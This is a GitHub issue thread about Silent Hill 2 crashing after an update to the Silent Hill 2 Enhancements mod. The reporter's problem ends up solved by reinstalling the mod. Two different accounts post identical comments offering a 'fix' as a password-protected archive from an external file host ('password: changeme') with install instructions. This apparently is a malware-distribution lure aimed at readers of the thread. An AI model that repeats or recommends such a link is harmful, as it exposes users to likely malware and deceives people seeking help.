### ISSUE TITLE
After this update Silent hill 2 crash in specific sections of the game!

### ISSUE THREAD

**Issue by luke76bg** [elishacloud/Silent-Hill-2-Enhancements#1017]
After the update, i started from the beginning and when i try to go in the back of the bathroom, the game crash, it simply close itself, then i loaded a save from the apartments, and when i tried to enter in the room with the pistol, same behavior, crash to desktop without any error. I removed reshade dll because i thought it was that the problem but nothing, still same crash in the bathroom. No problem before this update!
[d3d8.log](https://github.com/user-attachments/files/16823483/d3d8.log)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Polymega** [comment]
Run the Setup Tool and select "Install or Repair Packages". Choose the smaller sized packages to re-install first (as they're quicker to download) and see if that resolves your issue.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by luke76bg** [comment]
> Run the Setup Tool and select "Install or Repair Packages". Choose the smaller sized packages to re-install first (as they're quicker to download) and see if that resolves your issue.

I have reinstalled everything and nothing, same crashes!

**Comment by luke76bg** [comment]
Ok i removed the mod, reinstalled, and now everything it works as intended! Thanks!
